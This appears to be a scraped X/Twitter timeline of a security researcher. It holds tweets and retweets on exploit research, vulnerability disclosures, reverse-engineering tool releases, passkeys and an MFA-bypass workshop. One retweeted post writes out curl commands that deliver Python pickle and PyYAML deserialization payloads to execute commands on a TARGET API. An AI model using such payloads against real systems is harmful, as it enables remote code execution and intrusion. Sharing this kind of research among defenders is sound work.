Combatting entropy since 1975
Joined August 2008
- Tweets 3,994
- Following 818
- Followers 1,853
- Likes 4,853
68 Photos and videos
Pinned Tweet
11 Jul 2018
I don't always Invoke-RestMethod, but when I do, I always forget first do { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 }
10
Wormable RCE in Windows DNS. Wormable RCE in SMBv3. Linux kernel exploitation via eBPF and io_uring. Windows 11 kernel LPE. Android kernel exploitation bypassing DAC, SELinux, and Knox.
Full exploit chains with working PoCs. Heap grooming. ASLR bypass. CFG bypass. Type confusion. Kernel privilege escalation across three operating systems.
All free. All published with full writeups.
chomp.ie/
Author: @chompie1337
#ExploitDevelopment #ReverseEngineering #InfoSec
1
39
200
10,426
James Shewmaker retweeted
Jun 12
RSA private keys biased toward 0 bits can be factored by swapping a hard math problem for an easy one: integer factorization becomes polynomial factorization.
We found hundreds of real-world keys vulnerable to this. Many traced to a type mismatch in CompleteFTP (now patched): each 32-bit limb got only 8 bits of randomness. We recovered 603 RSA and 74 DSA private keys. blog.trailofbits.com/2026/06…
7
164
810
49,438
James Shewmaker retweeted
Jun 10
MSSQL has always been a favorite target. Now it ships its own egress channel.
@gershsec's latest research breaks down how SQL Server 2025's native AI features enable exfil, NTLM coercion, and C2 transport, all functioning as intended.
Read more 👇 ghst.ly/4e2L3JX
65
223
16,434
James Shewmaker retweeted
Jun 11
Forgot to add this to the release notes, but nibble wildcard patterns also work now! `67 6? ?7 67`
Jun 11
IDA 9.4 Beta has been released. Some of the major new features include
- Strings in the decompiler views will now FINALLY show up in the Strings view
- A new "Pathfinder" view that shows you how code execution flow looks like
- A new IDA protocol for sharing view states
- Automatically detecting Rust version and packages
and more
docs.hex-rays.com/release-no…
3
2
76
6,963
🚨 Introducing "ITScape" (CVE-2026-46316)
A Guest-to-Host Escape in KVM/arm64. Guest-side actions alone exploit a use-after-free to run root-privileged code in the host kernel.
Unlike the commonly published QEMU escapes, the bug lives in in-kernel KVM, not QEMU. On a successful exploit, commands run with host kernel privilege rather than the privilege of a user process, threatening the guest-host isolation of multi-tenant arm64 public clouds.
To the best of public knowledge, the first Guest-to-Host Escape Exploit targeting in-kernel KVM/arm64.
Details: itscape.io
4
91
296
25,519
James Shewmaker retweeted
Jun 10
yeh so anyways this is is a thing now (this is from yesterday, fwiw)
4
20
156
21,322
Along with extensive refactoring & numerous bug fixes, two new LBR commands have been added:
The '!lbr' command:
docs.hyperdbg.org/commands/e…
The '!lbrdump' command:
docs.hyperdbg.org/commands/e…
Also, the script engine now includes 5 new functions to support LBR:
docs.hyperdbg.org/commands/s…
Jun 10
I'm pleased to announce @HyperDbg v0.19.
This release introduces a new module, HyperTrace, which brings hypervisor-level integration w/ tracing technologies such as Last Branch Record (LBR) & Processor Trace (PT).
LBR is now available, with more coming.
github.com/HyperDbg/HyperDbg…
1
4
26
2,686
James Shewmaker retweeted
Jun 9
15
79
451
102,752
James Shewmaker retweeted
Jun 6
Padding Oracle in MS-BKRP (BackuprKey RPC)
“decrypt DPAPI v2/v3 domain backup
blobs via distinguishable error codes on the DC's BackuprKey endpoint.”
You need the masterkey in users roaming dir: Roaming\Microsoft\Protect\<SID>\<GUID>
Creds: Bad-Jubies
github.com/Bad-Jubies/Exploi…
1
26
78
4,576
James Shewmaker retweeted
Jun 6
New release: #PEbear 0.7.2: github.com/hasherezade/pe-be… - with important bugfixes and new features:
5
29
152
21,704
James Shewmaker retweeted
Jun 4
We helped FFmpeg find and fix 21 security vulnerabilities.
In a 1.5M-line codebase, we spent just $1K in API costs. Some of these bugs had been hiding for decades.
We also developed a PoC demonstrating an RCE primitive when FFmpeg processes RTSP streams.
Full write-up: depthfirst.com/research/21-z…
5
67
376
338,576
Jun 4
Both Marginally and a Border-line issue ...
Jun 4
We got married on a Saturday in Canada. On Monday, we were emigrating to the United States. My new wife and I said goodbye to the movers, flew to the border, and I got pulled into the big glass room for "extra questioning".
From her vantage point, she could see the immigration officer yelling, turning red, and waving his arms. She thought we were being denied entry... my Microsoft dreams crashing down right there.
What she couldn’t hear was that he had already approved my work visa. He was furious because their copy of Microsoft Word was printing a blank page at the end of every document, and it was wasting paper, and he wanted it fixed.
I helped adjust the margins. And so, after fixing the borders at the border, they released us to our new life in America.
58
James Shewmaker retweeted
Jun 2
For 19 years, GPS satellites have secretly broadcast a “numbers station” in their public signals. We decoded 12M messages: a 2011 flash where 31 of 32 satellites flipped in hours, “ghost” substrings repeating years apart, and a “TEXT” prefix spreading now. lsc-pagepro.mydigitalpublica…
46
357
2,098
404,803
RedSun: Exploiting Windows Defender's Remediation Workflow for Local Privilege Escalation
Just showing some appreciation for @ChaoticEclipse0's excellent work. Hopefully this won't get us banned!
open.substack.com/pub/calif/…
1
46
164
17,451
James Shewmaker retweeted
May 30
This Week on Brute Logic
Parsing Confusion - Cloud Pipelines
x.com/BRuteLogic/status/2058…
Path Traversal Bypasses
x.com/BRuteLogic/status/2059…
Leaking httpOnly Cookies for ATO
x.com/BRuteLogic/status/2059…
Python RCE - Pickle & PyYAML
x.com/BRuteLogic/status/2060…
Check our timeline for more.
May 28
Python RCE
Pickle
curl TARGET/api -H"Content-Type:application/json" -d'{"data":"gASVKwAAAAAAAACMCnN1YnByb2Nlc3OUjAxjaGVja19vdXRwdXSUk5RdlIwCaWSUYYWUUpQu"}'
PyYAML
curl TARGET/api/config -H"Content-Type:application/x-yaml" -d'!!python/object/new:subprocess.check_output [["id"]]'
1
11
105
8,887
James Shewmaker retweeted
May 30
Released PseudoForge 0.1.0.
An IDA Pro / Hex-Rays plugin built for Windows kernel driver analysis.
It cleans up raw decompiler output with rule-based passes, WDK-backed API profiles, user-defined rules, and optional LLM rename assist that is kept behind deterministic validation.
Current focus:
- DriverEntry reconstruction hints
- IRP / IOCTL dispatcher cleanup
- CTL_CODE and NTSTATUS decoding
- WDK API argument semantics
- pool tag recovery
- LIST_ENTRY traversal
- CONTAINING_RECORD patterns
- callback registration flows
- common kernel cleanup paths
This is still a very early release, so expect rough edges. 😆
repo: github.com/kernullist/Pseudo…
2
54
287
15,139
May 31
Device bound session credentials is going to be a lot of effort for not much return for public usage. It is still useful for hardening a private application, were re-registering/resetting accounts is going to be abnormal.
May 29
Here’s the official link:
workspaceupdates.googleblog.…
Also covered in the Google Security Blog: blog.google/security/protect…
Quick note on passkeys: they’re already doing something even stronger. Passkeys (WebAuthn/FIDO2) use private keys that are cryptographically bound to the device’s secure hardware (TPM, Secure Enclave, etc.) and never leave it.
There’s no “session cookie” equivalent that can be stolen and replayed the whole auth flow is proof-of-possession based and phishing-resistant by design. So in a way, they’ve had this protection baked in from the start.
1
1
208
May 31
The big problem is the huge number of public sites that must allow for cred reset/downgrades. It will continue to be "normal" to temporarily authenticate another way, which definitely will remain abusable.
101
James Shewmaker retweeted
May 29
Here’s the official link:
workspaceupdates.googleblog.…
Also covered in the Google Security Blog: blog.google/security/protect…
Quick note on passkeys: they’re already doing something even stronger. Passkeys (WebAuthn/FIDO2) use private keys that are cryptographically bound to the device’s secure hardware (TPM, Secure Enclave, etc.) and never leave it.
There’s no “session cookie” equivalent that can be stolen and replayed the whole auth flow is proof-of-possession based and phishing-resistant by design. So in a way, they’ve had this protection baked in from the start.
2
2
20
2,079
May 30
June 3rd's 4hr workshop: MFA bypass with MiTM on DNS (ettercap),HTTPS (evilginx),coercion (mitmproxy), BitB (BeEF) all at the same time. Still time to register. I'm bringing loaner devices as well.
2026.hthackers.com/#/agenda?…
73